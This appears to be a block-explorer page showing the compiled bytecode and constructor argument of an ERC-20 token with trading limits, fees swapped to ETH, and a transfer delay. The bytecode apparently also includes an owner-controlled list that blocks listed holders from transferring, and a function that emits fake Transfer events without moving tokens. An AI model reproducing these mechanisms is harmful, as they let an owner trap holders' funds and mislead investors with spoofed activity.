4d61782074782065786365656465642e00000000000000000000000000000000600082015250565b60006137bf6010836126d2565b91506137ca82613789565b602082019050919050565b600060208201905081810360008301526137ee816137b2565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b600061382b6013836126d2565b9150613836826137f5565b602082019050919050565b6000602082019050818103600083015261385a8161381e565b9050919050565b600081905092915050565b50565b600061387c600083613861565b91506138878261386c565b600082019050919050565b600061389d8261386f565b9150819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6000815190506138e58161282f565b92915050565b60006020828403121561390157613900612813565b5b600061390f848285016138d6565b91505092915050565b6000819050919050565b600061393d61393861393384613918565b612799565b61285b565b9050919050565b61394d81613922565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b6139888161281d565b82525050565b600061399a838361397f565b60208301905092915050565b6000602082019050919050565b60006139be82613953565b6139c8818561395e565b93506139d38361396f565b8060005b83811015613a045781516139eb888261398e565b97506139f6836139a6565b9250506001810190506139d7565b5085935050505092915050565b600060a082019050613a2660008301886129f8565b613a336020830187613944565b8181036040830152613a4581866139b3565b9050613a546060830185612b0c565b613a6160808301846129f8565b969550505050505056fea2646970667358221220ae6a6936583414edb9d816266642427f589f26ef77ac39720a8050e7c6b143ec64736f6c63430008160033000000000000000000000000b43474918f905e50c199ec16ea689a587679ef63

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106102535760003560e01c80638d3e6e4011610146578063bbc0c742116100c3578063dd62ed3e11610087578063dd62ed3e146106f0578063e884f26014610720578063f1f50a021461072a578063f2fde38b14610734578063f852b42d14610750578063f8b45b051461076c57610253565b8063bbc0c7421461065e578063c2b7bbb61461067c578063c647b20e14610698578063c78d0fa0146106b4578063cc1776d3146106d257610253565b80639e93ad8e1161010a5780639e93ad8e146105a6578063a457c2d7146105c4578063a9059cbb146105f4578063ab5a188714610624578063b2c25bce1461064057610253565b80638d3e6e40146104ee5780638da5cb5b1461051e5780638ed6795e1461053c57806391b296951461055857806395d89b411461058857610253565b80634a62bb65116101d45780636162c92e116101985780636162c92e1461045c5780636cd20f5e1461046657806370945d5f1461049657806370a08231146104b4578063715018a6146104e457610253565b80634a62bb65146103b65780634f7041a5146103d4578063540dd452146103f25780635d0044ca146104225780635d58ce361461043e57610253565b806323b872dd1161021b57806323b872dd146102fe57806326ededb81461032e578063313ce5671461034a5780633950935114610368578063452ed4f11461039857610253565b806306fdde03146102585780630758d92414610276578063095ea7b3146102945780631111f43f146102c457806318160ddd146102e0575b600080fd5b61026061078a565b60405161026d9190612757565b60405180910390f35b61027e61081c565b60405161028b91906127f8565b60405180910390f35b6102ae60048036038101906102a99190612891565b610840565b6040516102bb91906128ec565b60405180910390f35b6102de60048036038101906102d99190612998565b610863565b005b6102e861090a565b6040516102f59190612a07565b60405180910390f35b61031860048036038101906103139190612a22565b610914565b60405161032591906128ec565b60405180910390f35b61034860048036038101906103439190612a75565b610943565b005b610352610a1a565b60405161035f9190612af1565b60405180910390f35b610382600480360381019061037d9190612891565b610a23565b60405161038f91906128ec565b60405180910390f35b6103a0610a5a565b6040516103ad9190612b1b565b60405180910390f35b6103be610a80565b6040516103cb91906128ec565b60405180910390f35b6103dc610a93565b6040516103e99190612a07565b60405180910390f35b61040c60048036038101906104079190612b36565b610a99565b60405161041991906128ec565b60405180910390f35b61043c60048036038101906104379190612b63565b610ab9565b005b610446610ba2565b6040516104539190612a07565b60405180910390f35b610464610baa565b005b610480600480360381019061047b9190612b36565b610c32565b60405161048d91906128ec565b60405180910390f35b61049e610c88565b6040516104ab9190612a07565b60405180910390f35b6104ce60048036038101906104c99190612b36565b610c8e565b6040516104db9190612a07565b60405180910390f35b6104ec610cd7565b005b61050860048036038101906105039190612b36565b610ceb565b60405161051591906128ec565b60405180910390f35b610526610d0b565b6040516105339190612b1b565b60405180910390f35b61055660048036038101906105519190612b90565b610d34565b005b610572600480360381019061056d9190612b36565b610e3f565b60405161057f91906128ec565b60405180910390f35b610590610e5f565b60405161059d9190612757565b60405180910390f35b6105ae610ef1565b6040516105bb9190612a07565b60405180910390f35b6105de60048036038101906105d99190612891565b610ef7565b6040516105eb91906128ec565b60405180910390f35b61060e60048036038101906106099190612891565b610f6e565b60405161061b91906128ec565b60405180910390f35b61063e60048036038101906106399190612b63565b610f91565b005b61064861107b565b60405161065591906128ec565b60405180910390f35b61066661108e565b60405161067391906128ec565b60405180910390f35b61069660048036038101906106919190612b36565b6110a1565b005b6106b260048036038101906106ad9190612bd0565b6110ed565b005b6106bc611179565b6040516106c99190612a07565b60405180910390f35b6106da61117f565b6040516106e79190612a07565b60405180910390f35b61070a60048036038101906107059190612c10565b611185565b6040516107179190612a07565b60405180910390f35b61072861120c565b005b610732611231565b005b61074e60048036038101906107499190612b36565b6112a6565b005b61076a60048036038101906107659190612b90565b611329565b005b6107746114ca565b6040516107819190612a07565b60405180910390f35b60606006805461079990612c7f565b80601f01602080910402602001604051908101604052809291908181526020018280546107c590612c7f565b80156108125780601f106107e757610100808354040283529160200191610812565b820191906000526020600020905b8154815290600101906020018083116107f557829003601f168201915b5050505050905090565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b60008061084b6114d0565b90506108588185856114d8565b600191505092915050565b61086b6116a1565b60005b8383905081101561090457816003600086868581811061089157610890612cb0565b5b90506020020160208101906108a69190612b36565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808060010191505061086e565b50505050565b6000600554905090565b60008061091f6114d0565b905061092c85828561171f565b6109378585856117ab565b60019150509392505050565b61094b6116a1565b60005b83839050811015610a145783838281811061096c5761096b612cb0565b5b90506020020160208101906109819190612b36565b73ffffffffffffffffffffffffffffffffffffffff16601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516109ff9190612a07565b60405180910390a3808060010191505061094e565b50505050565b60006009905090565b600080610a2e6114d0565b9050610a4f818585610a408589611185565b610a4a9190612d0e565b6114d8565b600191505092915050565b601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600860019054906101000a900460ff1681565b600c5481565b600e6020528060005260406000206000915054906101000a900460ff1681565b610ac16116a1565b610ac9610a1a565b600a610ad59190612e75565b60646001610ae161090a565b610aeb9190612ec0565b610af59190612f31565b610aff9190612f31565b811015610b41576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3890612fae565b60405180910390fd5b610b49610a1a565b600a610b559190612e75565b81610b609190612ec0565b600b819055507fde064515fae8f8bb6d8ff19d2c6ba704322def7494147d8a971266430ade0788600b54604051610b979190612a07565b60405180910390a150565b600047905090565b610bb26116a1565b6000600860016101000a81548160ff0219169083151502179055506000600860006101000a81548160ff021916908315150217905550610bf061090a565b600a81905550610bfe61090a565b600b819055507fa4ffae85e880608d5d4365c2b682786545d136145537788e7e0940dff9f0b98c60405160405180910390a1565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600a5481565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610cdf6116a1565b610ce96000611911565b565b600f6020528060005260406000206000915054906101000a900460ff1681565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b610d3c6116a1565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da29061301a565b60405180910390fd5b80600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055507f998cce27cbf44405c67eb636a634d5e2f2e6ff248b3d71fbbbb022f3c4c6dd2d8282604051610e3392919061303a565b60405180910390a15050565b60106020528060005260406000206000915054906101000a900460ff1681565b606060078054610e6e90612c7f565b80601f0160208091040260200160405190810160405280929190818152602001828054610e9a90612c7f565b8015610ee75780601f10610ebc57610100808354040283529160200191610ee7565b820191906000526020600020905b815481529060010190602001808311610eca57829003601f168201915b5050505050905090565b61271081565b600080610f026114d0565b90506000610f108286611185565b905083811015610f55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f4c906130d5565b60405180910390fd5b610f6282868684036114d8565b60019250505092915050565b600080610f796114d0565b9050610f868185856117ab565b600191505092915050565b610f996116a1565b610fa1610a1a565b600a610fad9190612e75565b6103e86005610fba61090a565b610fc49190612ec0565b610fce9190612f31565b610fd89190612f31565b81101561101a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101190613141565b60405180910390fd5b611022610a1a565b600a61102e9190612e75565b816110399190612ec0565b600a819055507fbd5d3777a4ca05c2475cf0dd89d6a70173f775d8b42722c19d597cd7c870c4c7600a546040516110709190612a07565b60405180910390a150565b600860009054906101000a900460ff1681565b600860029054906101000a900460ff1681565b6110a96116a1565b80601260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6110f56116a1565b81600c819055507f5380a61520019ce8270d583f62f1b2b9f4f4372e1acaaf708f4865cecece0508600c5460405161112d9190612a07565b60405180910390a180600d819055507fa02824f65350567bc405e202b741e7ca6274004a9feeb44149df72b8bd599c97600d5460405161116d9190612a07565b60405180910390a15050565b60095481565b600d5481565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6112146116a1565b6000600860006101000a81548160ff021916908315150217905550565b6112396116a1565b600860029054906101000a900460ff1615611289576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611280906131ad565b60405180910390fd5b6001600860026101000a81548160ff021916908315150217905550565b6112ae6116a1565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361131d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113149061323f565b60405180910390fd5b61132681611911565b50565b6113316116a1565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036113a0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113979061301a565b60405180910390fd5b8061143657601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611435576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161142c906132ab565b60405180910390fd5b5b80600f60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055507f8f9f40630a1d139e6cf69b4f447ca47a36f10a017524efaa38252e516fa227ce82826040516114be92919061303a565b60405180910390a15050565b600b5481565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611547576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161153e9061333d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ad906133cf565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116949190612a07565b60405180910390a3505050565b6116a96114d0565b73ffffffffffffffffffffffffffffffffffffffff166116c76119d5565b73ffffffffffffffffffffffffffffffffffffffff161461171d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117149061343b565b60405180910390fd5b565b600061172b8484611185565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146117a55781811015611797576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161178e906134a7565b60405180910390fd5b6117a484848484036114d8565b5b50505050565b600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061184c5750600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b806118635750600860039054906101000a900460ff165b15611878576118738383836119e9565b61190c565b600860029054906101000a900460ff166118c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118be90613513565b60405180910390fd5b6118d2838383611cc2565b816118dd9190613533565b9050600860019054906101000a900460ff1615611900576118ff838383611ea8565b5b61190b8383836119e9565b5b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000806119e061231c565b90508091505090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a4f906135d9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ac7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611abe9061366b565b60405180910390fd5b611ad28383836123c0565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611b325760008114611b3157600080fd5b5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611bb9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bb0906136fd565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611ca99190612a07565b60405180910390a3611cbc8484846123c5565b50505050565b6000600954611cd030610c8e565b10158015611ceb5750600860039054906101000a900460ff16155b8015611d415750601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611d85576001600860036101000a81548160ff021916908315150217905550611d696123ca565b6000600860036101000a81548160ff0219169083151502179055505b6000601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015611de257506000600d54115b15611e0957612710600d5484611df89190612ec0565b611e029190612f31565b9050611e88565b601060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015611e6457506000600c54115b15611e8757612710600c5484611e7a9190612ec0565b611e849190612f31565b90505b5b6000811115611e9d57611e9c8530836119e9565b5b809150509392505050565b600860009054906101000a900460ff161561202f577f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015611f635750601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561202e5743601160003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410611fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fe090613769565b60405180910390fd5b43601160003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156120d25750600f60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561217957600a5481111561211c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612113906137d5565b60405180910390fd5b600b5461212883610c8e565b826121339190612d0e565b1115612174576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161216b90613841565b60405180910390fd5b612317565b601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561221c5750600f60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561226b57600a54811115612266576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161225d906137d5565b60405180910390fd5b612316565b600f60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661231557600b546122c883610c8e565b826122d39190612d0e565b1115612314576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161230b90613841565b60405180910390fd5b5b5b5b505050565b60008073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146123975760008054906101000a900473ffffffffffffffffffffffffffffffffffffffff166123bb565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b505050565b505050565b60006123d530610c8e565b9050600081036123e557506124b3565b60286009546123f49190612ec0565b81111561240d57602860095461240a9190612ec0565b90505b612416816124b5565b60004711156124b1576000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161246790613892565b60006040518083038185875af1925050503d80600081146124a4576040519150601f19603f3d011682016040523d82523d6000602084013e6124a9565b606091505b505080915050505b505b565b6000600267ffffffffffffffff8111156124d2576124d16138a7565b5b6040519080825280602002602001820160405280156125005781602001602082028036833780820191505090505b509050308160008151811061251857612517612cb0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156125bd573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906125e191906138eb565b816001815181106125f5576125f4612cb0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401612691959493929190613a11565b600060405180830381600087803b1580156126ab57600080fd5b505af11580156126bf573d6000803e3d6000fd5b505050505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156127015780820151818401526020810190506126e6565b60008484015250505050565b6000601f19601f8301169050919050565b6000612729826126c7565b61273381856126d2565b93506127438185602086016126e3565b61274c8161270d565b840191505092915050565b60006020820190508181036000830152612771818461271e565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60006127be6127b96127b484612779565b612799565b612779565b9050919050565b60006127d0826127a3565b9050919050565b60006127e2826127c5565b9050919050565b6127f2816127d7565b82525050565b600060208201905061280d60008301846127e9565b92915050565b600080fd5b600080fd5b600061282882612779565b9050919050565b6128388161281d565b811461284357600080fd5b50565b6000813590506128558161282f565b92915050565b6000819050919050565b61286e8161285b565b811461287957600080fd5b50565b60008135905061288b81612865565b92915050565b600080604083850312156128a8576128a7612813565b5b60006128b685828601612846565b92505060206128c78582860161287c565b9150509250929050565b60008115159050919050565b6128e6816128d1565b82525050565b600060208201905061290160008301846128dd565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261292c5761292b612907565b5b8235905067ffffffffffffffff8111156129495761294861290c565b5b60208301915083602082028301111561296557612964612911565b5b9250929050565b612975816128d1565b811461298057600080fd5b50565b6000813590506129928161296c565b92915050565b6000806000604084860312156129b1576129b0612813565b5b600084013567ffffffffffffffff8111156129cf576129ce612818565b5b6129db86828701612916565b935093505060206129ee86828701612983565b9150509250925092565b612a018161285b565b82525050565b6000602082019050612a1c60008301846129f8565b92915050565b600080600060608486031215612a3b57612a3a612813565b5b6000612a4986828701612846565b9350506020612a5a86828701612846565b9250506040612a6b8682870161287c565b9150509250925092565b600080600060408486031215612a8e57612a8d612813565b5b600084013567ffffffffffffffff811115612aac57612aab612818565b5b612ab886828701612916565b93509350506020612acb8682870161287c565b9150509250925092565b600060ff82169050919050565b612aeb81612ad5565b82525050565b6000602082019050612b066000830184612ae2565b92915050565b612b158161281d565b82525050565b6000602082019050612b306000830184612b0c565b92915050565b600060208284031215612b4c57612b4b612813565b5b6000612b5a84828501612846565b91505092915050565b600060208284031215612b7957612b78612813565b5b6000612b878482850161287c565b91505092915050565b60008060408385031215612ba757612ba6612813565b5b6000612bb585828601612846565b9250506020612bc685828601612983565b9150509250929050565b60008060408385031215612be757612be6612813565b5b6000612bf58582860161287c565b9250506020612c068582860161287c565b9150509250929050565b60008060408385031215612c2757612c26612813565b5b6000612c3585828601612846565b9250506020612c4685828601612846565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612c9757607f821691505b602082108103612caa57612ca9612c50565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612d198261285b565b9150612d248361285b565b9250828201905080821115612d3c57612d3b612cdf565b5b92915050565b60008160011c9050919050565b6000808291508390505b6001851115612d9957808604811115612d7557612d74612cdf565b5b6001851615612d845780820291505b8081029050612d9285612d42565b9450612d59565b94509492505050565b600082612db25760019050612e6e565b81612dc05760009050612e6e565b8160018114612dd65760028114612de057612e0f565b6001915050612e6e565b60ff841115612df257612df1612cdf565b5b8360020a915084821115612e0957612e08612cdf565b5b50612e6e565b5060208310610133831016604e8410600b8410161715612e445782820a905083811115612e3f57612e3e612cdf565b5b612e6e565b612e518484846001612d4f565b92509050818404811115612e6857612e67612cdf565b5b81810290505b9392505050565b6000612e808261285b565b9150612e8b83612ad5565b9250612eb87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612da2565b905092915050565b6000612ecb8261285b565b9150612ed68361285b565b9250828202612ee48161285b565b91508282048414831517612efb57612efa612cdf565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612f3c8261285b565b9150612f478361285b565b925082612f5757612f56612f02565b5b828204905092915050565b7f4d757374206265203e3d20312500000000000000000000000000000000000000600082015250565b6000612f98600d836126d2565b9150612fa382612f62565b602082019050919050565b60006020820190508181036000830152612fc781612f8b565b9050919050565b7f5a65726f20416464726573730000000000000000000000000000000000000000600082015250565b6000613004600c836126d2565b915061300f82612fce565b602082019050919050565b6000602082019050818103600083015261303381612ff7565b9050919050565b600060408201905061304f6000830185612b0c565b61305c60208301846128dd565b9392505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006130bf6025836126d2565b91506130ca82613063565b604082019050919050565b600060208201905081810360008301526130ee816130b2565b9050919050565b7f4d757374206265203e3d20302e35250000000000000000000000000000000000600082015250565b600061312b600f836126d2565b9150613136826130f5565b602082019050919050565b6000602082019050818103600083015261315a8161311e565b9050919050565b7f54726164696e6720697320616c72656164792061637469766500000000000000600082015250565b60006131976019836126d2565b91506131a282613161565b602082019050919050565b600060208201905081810360008301526131c68161318a565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006132296026836126d2565b9150613234826131cd565b604082019050919050565b600060208201905081810360008301526132588161321c565b9050919050565b7f5061697200000000000000000000000000000000000000000000000000000000600082015250565b60006132956004836126d2565b91506132a08261325f565b602082019050919050565b600060208201905081810360008301526132c481613288565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006133276024836126d2565b9150613332826132cb565b604082019050919050565b600060208201905081810360008301526133568161331a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006133b96022836126d2565b91506133c48261335d565b604082019050919050565b600060208201905081810360008301526133e8816133ac565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006134256020836126d2565b9150613430826133ef565b602082019050919050565b6000602082019050818103600083015261345481613418565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000613491601d836126d2565b915061349c8261345b565b602082019050919050565b600060208201905081810360008301526134c081613484565b9050919050565b7f54726164696e67206e6f74206163746976650000000000000000000000000000600082015250565b60006134fd6012836126d2565b9150613508826134c7565b602082019050919050565b6000602082019050818103600083015261352c816134f0565b9050919050565b600061353e8261285b565b91506135498361285b565b925082820390508181111561356157613560612cdf565b5b92915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006135c36025836126d2565b91506135ce82613567565b604082019050919050565b600060208201905081810360008301526135f2816135b6565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006136556023836126d2565b9150613660826135f9565b604082019050919050565b6000602082019050818103600083015261368481613648565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006136e76026836126d2565b91506136f28261368b565b604082019050919050565b60006020820190508181036000830152613716816136da565b9050919050565b7f5472616e736665722044656c617920656e61626c65642e000000000000000000600082015250565b60006137536017836126d2565b915061375e8261371d565b602082019050919050565b6000602082019050818103600083015261378281613746565b9050919050565b7f4d61782074782065786365656465642e00000000000000000000000000000000600082015250565b60006137bf6010836126d2565b91506137ca82613789565b602082019050919050565b600060208201905081810360008301526137ee816137b2565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b600061382b6013836126d2565b9150613836826137f5565b602082019050919050565b6000602082019050818103600083015261385a8161381e565b9050919050565b600081905092915050565b50565b600061387c600083613861565b91506138878261386c565b600082019050919050565b600061389d8261386f565b9150819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6000815190506138e58161282f565b92915050565b60006020828403121561390157613900612813565b5b600061390f848285016138d6565b91505092915050565b6000819050919050565b600061393d61393861393384613918565b612799565b61285b565b9050919050565b61394d81613922565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b6139888161281d565b82525050565b600061399a838361397f565b60208301905092915050565b6000602082019050919050565b60006139be82613953565b6139c8818561395e565b93506139d38361396f565b8060005b83811015613a045781516139eb888261398e565b97506139f6836139a6565b9250506001810190506139d7565b5085935050505092915050565b600060a082019050613a2660008301886129f8565b613a336020830187613944565b8181036040830152613a4581866139b3565b9050613a546060830185612b0c565b613a6160808301846129f8565b969550505050505056fea2646970667358221220ae6a6936583414edb9d816266642427f589f26ef77ac39720a8050e7c6b143ec64736f6c63430008160033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000b43474918f905e50c199ec16ea689a587679ef63

-----Decoded View---------------
Arg [0] : dev_ (address): 0xb43474918f905e50c199Ec16ea689a587679EF63

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000b43474918f905e50c199ec16ea689a587679ef63


Deployed Bytecode Sourcemap

